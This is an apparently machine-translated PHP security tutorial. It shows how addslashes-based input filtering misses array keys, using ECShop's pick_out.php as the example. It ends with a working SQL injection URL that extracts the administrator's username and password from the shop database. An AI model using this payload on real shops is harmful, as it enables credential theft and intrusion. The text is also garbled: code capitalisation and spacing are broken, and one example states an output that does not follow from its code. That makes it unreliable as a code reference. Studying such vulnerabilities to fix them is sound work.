Attackers can bypass addslashes and preg_replace functions under magic_quotes_gpc = off.

Preface according to some documents published by PHP6 (currently mainstream PHP5 and PHP4), register_globals, magic_quotes_gpc, and safe_mode will no longer exist, this practice officially takes into account the portability of PHP. With the GPC option removed, many programs must be rewritten. What exactly will it rewrite? At least one simulated magic_quo will be added.

Preface
InPHP6. According to some published documents (currently mainstream PHP5 and PHP4), register_globaLsThe options magic_quotes_gpc and safe_mode will no longer exist. Official practices like this take into account the portability of PHP. With the GPC option removed, many programs must be rewritten. What exactly will it rewrite? At least a function simulating magic_quotes_gpc will be added to process data. Now it is very promising to study function bypass in magic_quotes_gpc = off.

ADdSlashes Functions
Many programs will disable the GPC option considering the impact of the GPC function, and choose to use a built-in function addslashes of PHP for the predefined escape, and simulate a piece of code:

Define (\ 'Magic _ QUOTES_GPC \ ', get_magic_quotes_gpc ());
...
Foreach (array (\ '_ COOKIE \', \ '_ POST \', \ '_ GET \') as $ _ request ){
Foreach ($ _ request as $ _ key => $ _ value ){
$ _ Key {0 }! = \' _ \ '& $ _ Key = daddslashes ($ _ value );
}
}
...
FuNcTion daddslashes ($ sTrIng, $ force = 0) {// here, the daddslashes function is not used with addslashes. Pay attention to the name.
! DefinEd(\ 'Magic _ QUOTES_GPC \ ') & define (\ 'Magic _ QUOTES_GPC \', get_magic_quotes_gpc ());
If (! MAGIC_QUOTES_GPC | $ force ){
If (is_array ($ string )){
Foreach ($ string as $ key => $ val ){
$ String [$ key] = daddslashes ($ val, $ force );
}
} Else {
$ String = addslashes ($ string );
}
}
Return $ string;
}

Define and defined are built-in PHP functions. The former is used to define constants, and the latter is used to check whether constants exist. There are two foreach readers who will be hard to understand: first, pass the values \ '_ COOKIE \', \ '_ POST \', and \ '_ GET \' to $ _ request using the array Function, in this case, $ _ request becomes an array. The value of $ _ request [0] is _ COOKIE, and the value of $ _ request [1] is _ POST, $ _ request [2] has the value of _ GET, and uses the first foreach to output them cyclically. Then, it goes to the second foreach: $ _ request can be replaced with "$ _ request [0]", "$ _ request [1]", and "$ _ request [2]". in PHP, variables in double quotes still work and can represent values in variables, therefore, the preceding three array variables are replaced with the "$ _ COOKIE", "$ _ POST", and "$ _ GET" that are very familiar to the big family, and output them cyclically.
$ _ Key {0 }! = \ '_ \' Indicates that the name of the first data submitted cannot be "_", which can be satisfied obviously. Then, it reaches daddslashes ($ val, $ force ), note that the input parameters are $ val and $ force.
The last step is the definition of the daddslashes function: & represents the AND operator, | represents the OR operator; MAGIC_QUOTES_GPC constant does not exist AND a AND operation is performed using the define function to define constants. Continue. If MAGIC_QUOTES_GPC does not have a value, and $ force does not exist, or both exist, determine whether $ string is an array. If yes, use foreach to output each value cyclically, use the daddslashes function to cyclically reserve the value of each value. Note that the parameters here are $ val and $ force.
This Code requires a small knowledge of high and low-level operators, default values of functions, recursive calls, and so on. In this code, we can easily see that the parameter ($ string) of the addslashes function is the parameter $ val of the daddslashes function.
You may think that this piece of code cannot be found, but if you notice the call of its parameters, it is not difficult to find that the function only filters $ val while $ _ key does not. On the contrary, when magic_quotes_gpc = on, not only the variable value but also the variable name are processed. In fact, the daddslashes function only simulates some of the GPC functions.

Instance
ECShop is the largest free open-source online shop system ). ECShop versions earlier than v2.6.2, except des/init.Php(This file is often included.) When GPC is OFF, use the addslashes_deep function to filter $ _ REQUEST and $ _ COOKIE:

If (! Get_magic_quotes_gpc ())
{
If (! Empty ($ _ GET ))
{
$ _ GET = addslashes_deep ($ _ GET );
}
If (! Empty ($ _ POST ))
{
$ _ POST = addslashes_deep ($ _ POST );
}

$ _ COOKIE = addslashes_deep ($ _ COOKIE );
$ _ REQUEST = addslashes_deep ($ _ REQUEST );
}

If get_magic_quotes_gpc is off and data submitted by GET exists, use the addslashes_deep function to filter the PHP built-in variable $ _ GET (array), which is similar to the following. The addslashes_deep function is finally processed using the addslashes function in includes/lib_base.php:

Function addslashes_deep ($ value)
{
If (empty ($ value ))
{
Return $ value;
}
Else
{
Return is_array ($ value )? Array_map (\ 'addslashes _ deep \ ', $ value): addslashes ($ value );
}
}

If $ value is null, the return value is null. Otherwise, use "? B: C "operator, which can be replaced:

If (is_array ($ value ))
{
Array_map (\ 'addslashes _ deep \ ', $ value)
}
Else
{
Addslashes ($ value)
}

If $ value is an array, the PHP built-in function array_map is used to call the addslashes_deep function to repeatedly filter every value in the value array. Otherwise, the addslashes is used to reserve antsense. The role of the array_map function is described in an example:

Function cube ($ n ){
Return $ n * $ n; // This function uses the $ n parameter and returns the value to the power of $ n.
}

$ A = array (1, 2, 3, 4, 5); // $ a is an array
$ B = array_map (cube, $ a); // use the cube function to repeatedly execute the cubic operation of each value in the $ a Array under array_map.
Print_r ($ B); // $ B is an array for output.
?>

Result 50 is displayed.


 

 

0

After reading the function, let's look at the vulnerability file pick_out.php of ECShop:

If (! Empty ($ _ GET [\ 'attr \ '])
{
Foreach ($ _ GET [\ 'attr \ '] as $ key => $ value)
{
$ Key = intval ($ key );
$ _ GET [\ 'attr \ '] [$ key] = htmlspecialchars ($ value );

}
}
Omitting some code ......
$ Attr_table = \'\';
$ Attr_where = \'\';
$ Attr_url = \'\';
$ I = 0;
$ Goods_reSuLt = \'\';
Foreach ($ _ GET [\ 'attr \ '] AS $ key => $ value)
{
$ Attr_url. = \ '& attr [\'. $ key. \ '] = \'. $ value;

$ Attr_picks [] = $ key;
If ($ I> 0)
{
If (empty ($ goods_result ))
{
Break;
}
$ Goods_result = $ db-> getCol (SELECT goods _IdFROM. $ ecs-> table (goods_attr ). WHERE goods_id IN (. implode (\ ', \', $ goods_result ).) AND attr_id = \ '$ key \' AND attr_value = \ '$ value \');
}
Else
{
$ Goods_result = $ db-> getCol (SELECT goods_id FROM. $ ecs-> table (goods_attr ). WHERE attr_id = \ '$ key \' AND attr_value = \ '$ value \');
}
$ I ++;
}

Readers may be confused here. What's the problem if the built-in PHP function intval forcibly converts the key to the numeric type? Carefully check the previous foreach's $ _ GET [\ 'attr \ '] as $ key => $ value? Its code can be replaced:

...
Foreach ($ value [$ key] = $ _ GET [\ 'attr \ ']) // This write is not standard, just to make it easier for readers to understand.
{
$ Key = intval ($ key );
$ _ GET [\ 'attr \ '] [$ key] = htmlspecialchars ($ value );
}
...

Here we can see that the as keyword is used to copy every key and every value of the $ _ GET [\ 'attr \ '] array to $ key and $ value in a loop in foreach, however, it does not affect the data submitted in $ _ GET [\ 'attr \ '] (it is just a copy ). Despite this, the file contains the init. php, that is, we cannot control every value of $ _ GET [\ 'attr \ '], but every key can still be used!
Then there is the second foreach. The $ key variable is assigned two values first. Then, if we determine that the program has defined $ I = 0 on it, we will execute the else SQL query below. Although this loop also copies $ _ GET [\ 'attr \ '], this foreach is directly brought into the database for query, unlike the previous one. However, $ key is not filtered here, resulting in SQL injection. Construct the following SQL statement:

Pick_out.php?Cat_ Id = 123456 & attr [\ 'Union select concat (user_name, 0x3a, password) AS goods_id FROM ecs_admin_user WHERE action_list = \ 'all \ 'limit 1 #] = Tommie